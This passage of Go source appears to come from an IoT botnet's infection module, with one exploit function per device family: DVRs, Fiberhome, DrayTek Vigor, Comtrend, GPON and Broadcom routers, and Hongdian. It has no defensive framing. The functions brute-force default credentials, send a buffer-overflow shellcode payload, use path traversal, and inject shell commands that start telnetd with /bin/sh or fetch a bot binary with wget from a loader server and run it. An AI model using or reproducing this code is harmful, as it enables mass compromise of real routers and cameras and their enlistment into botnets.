\"SessionID\" : \"0x00000004\" }\x0a")) zeroByte(bytebuf) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() return } bytebuf = append(bytebuf, tmpbuf...) if strings.Contains(string(bytebuf), "}") { break } } zeroByte(bytebuf) conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x05\x73\x00\x00\x00{ \"Name\" : \"OPSystemUpgrade\", \"OPSystemUpgrade\" : { \"Action\" : \"Start\", \"Type\" : \"System\" }, \"SessionID\" : \"0x00000004\" }\x0a")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() return } bytebuf = append(bytebuf, tmpbuf...) if strings.Contains(string(bytebuf), "}") { break } } zeroByte(bytebuf) conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x05\x62\x01\x00\x00\x50\x4B\x03\x04\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\xB5\x90\x3D\x0B\xC2\x30\x10\x86\x77\x7F\xC5\x91\xD9\x62\x15\x1C\x74\xAD\x88\xAE\x56\x5D\xC4\x21\x35\x87\x0D\xC6\xE4\x48\xE2\x47\x91\xFE\x77\xDB\x14\x11\xAB\x8B\x88\x37\x64\x79\xDE\x7B\x2E\x77\xB7\x0E\x00\x5B\xD1\xDE\x72\x81\x89\x39\x1E\xB9\x16\x6C\x0C\x9B\x0E\x54\x55\xB1\x50\xEC\x09\x58\x9A\xA3\x52\xAC\xFB\x20\xE9\xCE\x4A\xF2\x35\xF0\xA8\x34\x7A\x01\x11\xC1\x28\x8E\xFB\x10\x29\xE8\x65\x52\xF7\x5C\xCE\x42\xB8\xEC\x7E\xEF\xCC\x4E\xAE\xC8\xCC\x15\xFE\xE1\x76\x0A\x91\x60\x30\x1C\x0D\xE2\xF8\xF7\x1F\x7E\xB0\x55\xEF\xB6\xEE\x60\x33\x6E\xC5\x85\x5B\x0C\xA2\x83\xA4\x24\xC7\xDD\x81\x05\x94\x9E\x88\x8C\xF5\x53\xC5\x5D\xBE\x2C\x08\xDF\x4F\x1F\xD0\x7C\xF2\xD2\xDB\x1E\x30\xC1\x73\x48\xB4\xED\x6B\xD4\xC2\xD8\x36\x68\x36\x23\xEE\x65\xA6\x70\x8D\xD6\x49\xA3\xAB\x4C\xD4\x6F\xD0\x22\x69\xCD\x2A\xEF\x50\x4B\x01\x02\x3F\x03\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x24\x00\x00\x00\x00\x00\x00\x00\x20\x80\xA4\x81\x00\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\x0A\x00\x20\x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xCA\x6F\xF3\x26\x5C\xD5\x01\x00\x40\x5B\x5C\x2F\x5C\xD5\x01\x80\xD6\xF3\x5C\x2F\x5C\xD5\x01\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x5D\x00\x00\x00\xEF\x00\x00\x00\x00\x00")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() return } bytebuf = append(bytebuf, tmpbuf...) if strings.Contains(string(bytebuf), "}") { break } } zeroByte(bytebuf) conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x01\xf2\x05\x00\x00\x00\x00")) splitStr := strings.Split(target, ":") time.Sleep(10 * time.Second) fmt.Printf("\x1b[38;5;46mDvrip\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell opened\x1b[38;5;15m\r\n", target) go telnetLoader(splitStr[0] + ":9001", 0, "arm7", loaderDvripTag) conn.Write([]byte("\xFF\x01\x00\x00\x57\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x03\x27\x00\x00\x00{ \"Name\" : \"\", \"SessionID\" : \"0x00000004\" }\x0a")) conn.Close() return } /* ------ END OF THE OTHER STUFF ------ */ func ucSofiaCheck(target string, pid string) (found int) { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return -1 } defer conn.Close() tmp := make([]byte, 256) buf := make([]byte, 0, 512) fmt.Fprintf(conn, "GET ../../proc/%s/cmdline HTTP\r\n\r\n", pid) for { n, err := conn.Read(tmp) if err != nil { break } buf = append(buf, tmp[:n]...) } if (strings.Contains(string(buf), "/var/Sofia") || strings.Contains(string(buf), "usr/bin/Sofia") || strings.Contains(string(buf), "system_sofia") || strings.Contains(string(buf), "/var/bin/system_sofia")) && !strings.Contains(string(buf), "dvrHelper") { return 1 } else { return -1 } } func ucGuessSmaps(target string, pid string) (found int) { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return -1 } defer conn.Close() tmp := make([]byte, 8096) buf := make([]byte, 0, 512) fmt.Fprintf(conn, "GET ../../proc/%s/smaps HTTP\r\n\r\n", pid) for { n, err := conn.Read(tmp) if err != nil { break } buf = append(buf, tmp[:n]...) } smapsLines := strings.Split(string(buf), "\n") smapsCount := 0 gotRegion := 0 regionsAdded := 0 for i := 0; i < len(smapsLines); i++ { if !strings.Contains(string(smapsLines[i]), "rwxp") { continue } smapsCount++ } smapsRegions := make([]*smapsRegion, smapsCount) for i := range smapsRegions { smapsRegions[i] = &smapsRegion{} } for i := 0; i < len(smapsLines); i++ { if gotRegion == 8 || gotRegion == 0 { if !strings.Contains(string(smapsLines[i]), "rwxp") { continue } region := strings.Split(string(smapsLines[i]), "-") smapsRegions[regionsAdded].region = hexToInt(region[0]) for q := 0; q < len(region); q++ { region[q] = "" } gotRegion = 1 } else { if gotRegion == 1 { startAt := 0 endAt := 0 for q := 0; q < len(smapsLines[i]); q++ { if startAt == 0 { if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil { startAt = q continue } } if endAt == 0 && startAt > 0 { if smapsLines[i][q:q+1] == " " { endAt = q continue } } } if startAt > 0 && endAt > 0 { smapsRegions[regionsAdded].size, _ = strconv.Atoi(smapsLines[i][startAt:endAt]) gotRegion = 2 continue } } else if gotRegion == 2 { startAt := 0 endAt := 0 for q := 0; q < len(smapsLines[i]); q++ { if startAt == 0 { if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil { startAt = q continue } } if endAt == 0 && startAt > 0 { if smapsLines[i][q:q+1] == " " { endAt = q continue } } } if startAt > 0 && endAt > 0 { smapsRegions[regionsAdded].rss, _ = strconv.Atoi(smapsLines[i][startAt:endAt]) gotRegion = 3 continue } } else if gotRegion == 3 { startAt := 0 endAt := 0 for q := 0; q < len(smapsLines[i]); q++ { if startAt == 0 { if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil { startAt = q continue } } if endAt == 0 && startAt > 0 { if smapsLines[i][q:q+1] == " " { endAt = q continue } } } if startAt > 0 && endAt > 0 { smapsRegions[regionsAdded].pss, _ = strconv.Atoi(smapsLines[i][startAt:endAt]) gotRegion = 4 continue } } else if gotRegion == 4 { startAt := 0 endAt := 0 for q := 0; q < len(smapsLines[i]); q++ { if startAt == 0 { if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil { startAt = q continue } } if endAt == 0 && startAt > 0 { if smapsLines[i][q:q+1] == " " { endAt = q continue } } } if startAt > 0 && endAt > 0 { smapsRegions[regionsAdded].shared_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt]) gotRegion = 5 continue } } else if gotRegion == 5 { startAt := 0 endAt := 0 for q := 0; q < len(smapsLines[i]); q++ { if startAt == 0 { if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil { startAt = q continue } } if endAt == 0 && startAt > 0 { if smapsLines[i][q:q+1] == " " { endAt = q continue } } } if startAt > 0 && endAt > 0 { smapsRegions[regionsAdded].shared_ditry, _ = strconv.Atoi(smapsLines[i][startAt:endAt]) gotRegion = 6 continue } } else if gotRegion == 6 { startAt := 0 endAt := 0 for q := 0; q < len(smapsLines[i]); q++ { if startAt == 0 { if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil { startAt = q continue } } if endAt == 0 && startAt > 0 { if smapsLines[i][q:q+1] == " " { endAt = q continue } } } if startAt > 0 && endAt > 0 { smapsRegions[regionsAdded].private_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt]) gotRegion = 7 continue } } else if gotRegion == 7 { startAt := 0 endAt := 0 for q := 0; q < len(smapsLines[i]); q++ { if startAt == 0 { if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil { startAt = q continue } } if endAt == 0 && startAt > 0 { if smapsLines[i][q:q+1] == " " { endAt = q continue } } } if startAt > 0 && endAt > 0 { smapsRegions[regionsAdded].private_dirty, _ = strconv.Atoi(smapsLines[i][startAt:endAt]) gotRegion = 8 regionsAdded++ continue } } gotRegion++ } } for i := len(smapsRegions) - 7; i > 1; i-- { if smapsRegions[i].size == 8188 && smapsRegions[i + 1].size == 8188 && smapsRegions[i + 2].size == 8188 && smapsRegions[i + 3].size == 8188 && smapsRegions[i + 4].size == 8188 && smapsRegions[i + 5].size == 8188 && smapsRegions[i + 6].size == 8188 { if smapsRegions[i].rss == 4 && smapsRegions[i + 1].rss == 4 && smapsRegions[i + 2].rss == 4 && smapsRegions[i + 3].rss >= 8 && smapsRegions[i + 4].rss >= 4 && smapsRegions[i + 5].rss >= 4 && smapsRegions[i + 6].rss >= 8 { return int(smapsRegions[i + 3].region) } } } return 0 } func ucSendBof(target string, offset int) { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } defer conn.Close() v := uint32(offset) offsetBuf := make([]byte, 4) binary.LittleEndian.PutUint32(offsetBuf, v) conn.Write([]byte("GET ")) conn.Write([]byte(uchttpdShellCode)) for i := 0; i < 299 - len(uchttpdShellCode); i ++ { conn.Write([]byte("a")) } conn.Write([]byte(offsetBuf)) conn.Write([]byte(" HTTP\r\n\r\n")) buf := make([]byte, 0, 512) tmp := make([]byte, 256) for { n, err := conn.Read(tmp) if err != nil { break } buf = append(buf, tmp[:n]...) } zeroByte(buf) zeroByte(tmp) } func infectFunctionUchttpd(target string) { var pidStrs[128] string var pidsFound int = 0 conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } /* Dvrip check */ go func() { ipslit := strings.Split(target, ":") tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":34567", 10 * time.Second) if err == nil { tmpconn.Close() infectFunctionDvrip(ipslit[0] + ":34567") } } () /* ////////////// */ /* Libdvr check */ go func() { ipslit := strings.Split(target, ":") tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":9527", 10 * time.Second) if err == nil { tmpconn.Close() infectFunctionLibdvr(ipslit[0] + ":9527") } } () /* ////////////// */ tmp := make([]byte, 256) buf := make([]byte, 0, 512) fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n") for { n, err := conn.Read(tmp) if err != nil { break } buf = append(buf, tmp[:n]...) } if !strings.Contains(string(buf), "Index of /mnt/web/") { zeroByte(tmp) zeroByte(buf) conn.Close() time.Sleep(10 * time.Second) return } zeroByte(tmp) zeroByte(buf) conn.Close() conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { time.Sleep(10 * time.Second) return } buf = make([]byte, 0, 8096) tmp = make([]byte, 256) fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n") for { n, err := conn.Read(tmp) if err != nil { break } buf = append(buf, tmp[:n]...) } pids := strings.Split(string(buf), "\n") for i := 0; i < len(pids); i++ { if i >= 128 { break } if len(pids[i]) < 38 { continue } if _, err := strconv.Atoi(pids[i][33:34]); err != nil { continue } pidstr := pids[i][33:38] if _, err := strconv.Atoi(pidstr[0:1]); err == nil { if _, err := strconv.Atoi(pidstr[1:2]); err == nil { if _, err := strconv.Atoi(pidstr[2:3]); err == nil { if _, err := strconv.Atoi(pidstr[3:4]); err == nil { if _, err := strconv.Atoi(pidstr[4:5]); err == nil { if len(pidstr[0:]) >= 5 { pidStrs[pidsFound] = pidstr[0:5] pidsFound++ continue } } else { if len(pidstr[0:]) >= 4 { pidStrs[pidsFound] = pidstr[0:4] pidsFound++ continue } } } else { if len(pidstr[0:]) >= 3 { pidStrs[pidsFound] = pidstr[0:3] pidsFound++ continue } } } else { if len(pidstr[0:]) >= 2 { pidStrs[pidsFound] = pidstr[0:2] pidsFound++ continue } } } else { if len(pidstr[0:]) >= 1 { pidStrs[pidsFound] = pidstr[0:1] pidsFound++ continue } } } pidstr = "" } zeroByte(buf) zeroByte(tmp) if pidsFound <= 5 { conn.Close() time.Sleep(10 * time.Second) return } conn.Close() for i := pidsFound; i > 1; i-- { retval := ucSofiaCheck(target, pidStrs[i]) if retval == -1 { continue } retval = ucGuessSmaps(target, pidStrs[i]) if retval == -1 { continue } stackOffset := retval + 0x7fd3d8 + 20 ucSendBof(target, stackOffset) break } for i := 0; i < pidsFound; i++ { pidStrs[i] = "" } zeroByte(buf) zeroByte(tmp) time.Sleep(10 * time.Second) return } func infectFunctionTvt(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } /* TVT4567 check */ go func() { ipslit := strings.Split(target, ":") tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":4567", 10 * time.Second) if err == nil { infectFunctionTvt4567(tmpconn) } return } () /* ////////////// */ payload := "refuseallowipiprangemactruerefusetrueip$(" payload += tvtWebPayload payload += ")" cntlen := strconv.Itoa(len(payload)) conn.Write([]byte("POST /editBlackAndWhiteList HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: " + cntlen + "\r\nAccept-Language: en-us\r\nHost: " + target + "\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: text/xml\r\nAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=\r\n\r\n" + payload + "\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "success") { fmt.Printf("\x1b[38;5;46mTvt\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target) payloadSent++ break } } conn.Close() time.Sleep(10 * time.Second) } func infectFunctionFiberhome(target string) { var ( rdbuf []byte = []byte("") authed int = 0 telnetPort int = 0 ) conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("POST /goform/webLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 23\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/login_inter.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nUser=admin&Passwd=admin\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") { authed = 1 break } } conn.Close() if authed == 0 { return } conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /menu_inter.asp HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://" + target + "/login_inter.asp\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\nUpgrade-Insecure-Requests: 1\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") { authed = 1 break } } conn.Close() if fiberRandPort == 1 { rand.Seed(time.Now().UnixNano()) telnetPort = rand.Intn(50000) + 10000 } else { telnetPort = fiberStaticPort } for i := 0; i < len(fiberSecStrs); i++ { conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /goform/setPing?ping_ip=;telnetd%20-l/bin/sh%20-p" + strconv.Itoa(telnetPort) + "&requestNum=" + strconv.Itoa(i + 1) + "&diagtype=1&" + fiberSecStrs[i] + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\nCookie: loginName=admin\r\n\r\n")) tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { conn.Close() break } conn.Close() if !strings.Contains(string(rdbuf), "200 OK") { return } } time.Sleep(3 * time.Second) ipslit := strings.Split(target, ":") conn, err = net.DialTimeout("tcp", ipslit[0] + ":" + strconv.Itoa(telnetPort), 10 * time.Second) if err == nil { fmt.Printf("\x1b[38;5;46mFiberhome\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m telnet shell opened\x1b[38;5;15m\r\n", target) go telnetLoader(ipslit[0] + ":" + strconv.Itoa(telnetPort), 0, "mips", loaderFiberhomeTag) conn.Close() } return } func infectFunctionVigor(target string) { var rdbuf []byte = []byte("") conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } payload := "action=login&keyPath=%27%0A%09%2F" payload += vigorPayload payload += "%27%0A%09%27&loginPwd=a&loginUser=a" cntlen := strconv.Itoa(len(payload)) conn.Write([]byte("POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nContent-Length: " + cntlen + "\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n" + payload + "\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") { fmt.Printf("\x1b[38;5;46mVigor\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target) payloadSent++ break } } conn.Close() } func infectFunctionComtrend(target string) { var ( rdbuf []byte = []byte("") state = 0 sessionKey = "null" ) conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /pingview.cmd HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/left.html\r\nUpgrade-Insecure-Requests: 1\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "&sessionKey=") && strings.Contains(string(rdbuf), "var code = 'location=") && state != 1 { sessionKey = getStringInBetween(string(rdbuf), " loc += '&sessionKey=", "';\n}\n\nvar code = 'location=\"' + loc + '\"';\n") if sessionKey == "null" { break } conn.Close() conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET /ping.cgi?pingIpAddress=;cd%20/mnt;wget%20http://" + loaderDownloadServer + "/multi/wget.sh%20-O-%20>sfs;chmod%20777%20sfs;sh%20sfs%20" + loaderComtrendTag + ";&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nAuthorization: Basic cm9vdDoxMjM0NQ==\r\nConnection: close\r\nReferer: http://" + target + "/ping.cgi\r\nUpgrade-Insecure-Requests: 1\r\n\r\n")) state = 1 } else if state == 1 { if strings.Contains(string(rdbuf), "function btnPing()") { fmt.Printf("\x1b[38;5;46mComtrend\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target) payloadSent++ conn.Close() return } } } conn.Close() } func infectFunctionGponFiber(target string) { var ( rdbuf []byte = []byte("") logins []string = []string{"user:user", "adminisp:adminisp", "admin:stdONU101"} stage = 0 ) conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } for i := 0; i < len(logins); i++ { loginSplit := strings.Split(logins[i], ":") conn, err := net.DialTimeout("tcp", target, 60 * time.Second) if err != nil { return } cntlen := 14 cntlen = len(loginSplit[0]) cntlen = len(loginSplit[1]) conn.Write([]byte("POST /boaform/admin/formLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + strconv.Itoa(cntlen) + "\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/admin/login.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nusername=" + loginSplit[0] + "&psd=" + loginSplit[1] + "\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "ERROR:bad password!") { zeroByte(rdbuf) break } else if (strings.Contains(string(rdbuf), "HTTP/1.0 302 Moved Temporarily") || strings.Contains(string(rdbuf), "ERROR:you have logined!")) && stage != 1{ conn.Close() conn, err := net.DialTimeout("tcp", target, 60 * time.Second) if err != nil { return } payload := "target_addr=%3Brm%20-rf%20/var/tmp/stainfo%3Bwget%20http://" + loaderDownloadServer + loaderBinsLocation + "bot.mips%20-O%20->/var/tmp/stainfo%3Bchmod%20777%20/var/tmp/stainfo%3B/var/tmp/stainfo%20" + loaderGponfiberTag + "&waninf=1_INTERNET_R_VID_" cntlen := strconv.Itoa(len(payload)) conn.Write([]byte("POST /boaform/admin/formTracert HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " + cntlen + "\r\nOrigin: http://" + target + "\r\nConnection: close\r\nReferer: http://" + target + "/diag_tracert_admin_en.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\n" + payload + "\r\n\r\n")) stage = 1 zeroByte(rdbuf) continue } else if stage == 1 { if strings.Contains(string(rdbuf), "value=\" OK \"") { fmt.Printf("\x1b[38;5;46mGponFiber\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, loginSplit[0], loginSplit[1]) conn.Close() payloadSent++ return } } } conn.Close() } conn.Close() } func infectFunctionBroadcomSessionKey(target string, auth string) string { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return "" } defer conn.Close() conn.Write([]byte("GET /ping.html HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic " + auth + "\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/menu.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n")) for { bytebuf := make([]byte, 256) rdlen, err := conn.Read(bytebuf) if err != nil || rdlen <= 0 { return "" } if strings.Contains(string(bytebuf), "pingHost.cmd") && strings.Contains(string(bytebuf), "&sessionKey=") { index1 := strings.Index(string(bytebuf), "&sessionKey=") index2 := strings.Index(string(bytebuf)[index1+len("&sessionKey="):], "';") sessionKey := string(bytebuf)[index1+len("&sessionKey="):index1+len("&sessionKey=")+index2] return sessionKey } } return "" } func infectFunctionBroadcom(target string) { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nCache-Control: max-age=0\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n")) bytebuf := make([]byte, 64) rdlen, err := conn.Read(bytebuf) if err != nil || rdlen <= 0 { conn.Close() return } conn.Close() if !strings.Contains(string(bytebuf), "HTTP/1.1 200 Ok\r\nServer: micro_httpd") { return } conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } sessionKey := infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0") conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=" + broadcomPayload + "&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n")) bytebuf = make([]byte, 256) rdlen, err = conn.Read(bytebuf) if err != nil || rdlen <= 0 { return } conn.Close() conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0") conn.Write([]byte("GET /pingHost.cmd?action=add&targetHostAddress=;ps|sh&sessionKey=" + sessionKey + " HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/ping.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n")) bytebuf = make([]byte, 256) rdlen, err = conn.Read(bytebuf) if err != nil || rdlen <= 0 { return } conn.Close() if !strings.Contains(string(bytebuf), "COMPLETED") { fmt.Printf("\x1b[38;5;46mBroadcom\x1b[38;5;15m: \x1b[38;5;134m%s:%s:%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target, "support", "support") return } conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } sessionKey = infectFunctionBroadcomSessionKey(target, "c3VwcG9ydDpzdXBwb3J0") conn.Write([]byte("GET /sntpcfg.cgi?ntp_enabled=1&ntpServer1=time.nist.gov&ntpServer2=&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=-05:00&timezone=XXX+5YYY,M3.2.0/02:00:00,M11.1.0/02:00:00&tzArray_index=13&use_dst=0&sessionKey=" + sessionKey +" HTTP/1.1\r\nHost: " + target + "\r\nAuthorization: Basic c3VwcG9ydDpzdXBwb3J0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\nReferer: http://" + target + "/sntpcfg.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\r\nConnection: close\r\n\r\n")) bytebuf = make([]byte, 256) rdlen, err = conn.Read(bytebuf) if err != nil || rdlen <= 0 { return } conn.Close() } func infectFunctionHongdian(target string) { var ( rdbuf []byte = []byte("") logins []string = []string{"admin:admin", "admin:1234", "admin:12345", "admin:123456", "admin:54321", "admin:password", "admin:", "admin:admin123"} ) for i := 0; i < len(logins); i++ { conn, err := net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } authStr := base64.StdEncoding.EncodeToString([]byte(logins[i])) conn.Write([]byte("GET / HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAuthorization: Basic " + authStr + "\r\nConnection: close\r\n\r\n")) for { tmpbuf := make([]byte, 128) ln, err := conn.Read(tmpbuf) if ln <= 0 || err != nil { break } rdbuf = append(rdbuf, tmpbuf...) if strings.Contains(string(rdbuf), "HTTP/1.1 200 OK") { conn.Close() conn, err = net.DialTimeout("tcp", target, 10 * time.Second) if err != nil { return } payload := "op_type=ping&destination=%3B" payload += hongdianPayload payload += "&user_options=" cntlen := strconv.Itoa(len(payload)) conn.Write([]byte("POST /tools.cgi HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: 